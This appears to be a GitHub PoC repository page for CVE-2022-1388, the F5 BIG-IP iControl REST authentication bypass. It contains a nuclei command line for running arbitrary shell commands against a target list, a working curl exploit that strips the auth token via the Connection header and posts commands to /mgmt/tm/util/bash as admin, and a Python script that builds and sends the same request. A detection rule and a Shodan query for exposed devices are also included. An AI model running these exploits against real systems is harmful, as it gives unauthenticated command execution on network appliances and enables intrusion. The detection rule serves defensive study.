
CVE-2022-1388 PoC: F5 BIG-IP access control error vulnerability

Source
Associated Vulnerability
Title: F5 BIG-IP access control error vulnerability (CVE-2022-1388)
Description: On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Description
CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP's iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.
Readme
# Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter
CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP's iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.

## This template uses nuclei's CLI variables (the token-spray mechanism)
This nuclei template takes the shell command to execute as a parameter instead of hard-coding it. The CLI variable feature that token-spray templates use to feed a token obtained from another workflow or a manual search into a template at run time is used here to feed a single command, or a file of commands, into the template's `CMD` variable:

> `-V, -var value              custom vars in var=value format`

```bash
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var "CMD=uname -a"
```
![Captura de tela de 2022-05-10 01-28-12](https://user-images.githubusercontent.com/17049332/167542872-e92763aa-1a46-48f5-9acd-54b150b37c50.png)


## POC Manual
```bash
# YWRtaW46 is base64("admin:"), i.e. the admin user with an empty password.
# Naming X-F5-Auth-Token in the Connection header marks it hop-by-hop, so the
# front-end proxy strips the token before the request reaches the back end;
# the back end then falls through to the Basic credentials and runs the
# command as admin.
curl -s \
  -H "Host: localhost:8100" \
  -H "Content-Type: application/json" \
  -H "Connection: keep-alive, X-F5-Auth-Token" \
  -H "X-F5-Auth-Token: a" \
  -H "Authorization: Basic YWRtaW46" \
  -d '{"command":"run","utilCmdArgs":"-c id"}' \
  http://{{TARGET_IP}}/mgmt/tm/util/bash
```
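The following is an added example and is not code from this README or from the nuclei template. It builds the same raw HTTP request the manual curl sends, so the bypass can be reproduced from a script against a lab device, and pairs it with a small detection rule that flags that request pattern in captured traffic: a request under `/mgmt/` that lists `X-F5-Auth-Token` as a hop-by-hop header in `Connection` while presenting Basic credentials. The lab address, port, and the benign sample request are constructed for illustration.

```python
import base64
import json
import socket

# Constructed for this example: nothing here is captured from a real device.
TOKEN_HEADER = "x-f5-auth-token"


def build_bypass_request(cmd: str, host_header: str = "localhost:8100") -> bytes:
    """Return the raw HTTP/1.1 request the manual curl PoC sends.

    Listing X-F5-Auth-Token in the Connection header marks it hop-by-hop, so
    the front-end proxy strips the token before the request reaches the back
    end; the back end then falls back to the Basic credentials 'admin:'
    (empty password) and runs the command as admin.
    """
    body = json.dumps({"command": "run", "utilCmdArgs": "-c " + cmd})
    basic = base64.b64encode(b"admin:").decode()  # 'YWRtaW46', as in the curl
    lines = [
        "POST /mgmt/tm/util/bash HTTP/1.1",
        "Host: " + host_header,
        "Content-Type: application/json",
        "Connection: keep-alive, X-F5-Auth-Token",
        "X-F5-Auth-Token: a",
        "Authorization: Basic " + basic,
        "Content-Length: " + str(len(body)),
        "",
        body,
    ]
    return "\r\n".join(lines).encode()


def send_raw(target_ip: str, port: int, raw: bytes, timeout: float = 10.0) -> bytes:
    """Deliver the request over plain TCP, as the http:// URL in the curl does.
    Reads until the peer closes or the timeout expires (assumed lab use only)."""
    chunks = []
    with socket.create_connection((target_ip, port), timeout=timeout) as sock:
        sock.sendall(raw)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


def parse_request(raw: bytes):
    """Split a raw request into (method, path, {lower-case header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    method, path = (parts[0], parts[1]) if len(parts) > 1 else (parts[0], "")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_cve_2022_1388_attempt(raw: bytes) -> bool:
    """Detection rule: an iControl REST request that names X-F5-Auth-Token as a
    hop-by-hop header in Connection while presenting Basic credentials.
    Legitimate clients never ask the proxy to drop the token header."""
    _, path, h = parse_request(raw)
    connection_tokens = {t.strip().lower() for t in h.get("connection", "").split(",")}
    return (
        path.startswith("/mgmt/")
        and TOKEN_HEADER in connection_tokens
        and h.get("authorization", "").lower().startswith("basic ")
    )


# Constructed sample of a normal token-authenticated call, for contrast.
BENIGN_REQUEST = (
    b"GET /mgmt/tm/sys/version HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Connection: keep-alive\r\n"
    b"X-F5-Auth-Token: 7K2G4Q3HXYZ\r\n"
    b"\r\n"
)


def demo():
    """Run the rule over the exploit request and the benign one."""
    exploit = build_bypass_request("id")
    return is_cve_2022_1388_attempt(exploit), is_cve_2022_1388_attempt(BENIGN_REQUEST)


if __name__ == "__main__":
    flagged, benign = demo()
    print("exploit request flagged:", flagged)
    print("benign request flagged:", benign)
    # Against an assumed lab device, e.g.:
    # print(send_raw("192.0.2.10", 80, build_bypass_request("id")).decode(errors="replace"))
```

The rule keys on the combination rather than on any single header: Basic auth to `/mgmt/` is normal for scripted clients, and `X-F5-Auth-Token` is normal for token-authenticated ones, but a client that presents both and asks the proxy to discard the token has no legitimate reason to do so.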

### Additional Details
- https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

### References
- https://blog.projectdiscovery.io/nuclei-v2-5-release/
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- https://github.com/alt3kx/CVE-2022-1388_PoC
- https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
- https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
- https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
- https://github.com/tenable/audit_files/tree/master/cve-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
- https://twitter.com/1ZRR4H/status/1522165718975922178
- https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml
File Snapshot

```
[4.0K] /data/pocs/f45853eddb7f0db2ec675c3914c79d17535c846e
├── [2.2K] exploit-CVE-2022-1388.yaml
└── [2.6K] README.md

0 directories, 2 files
```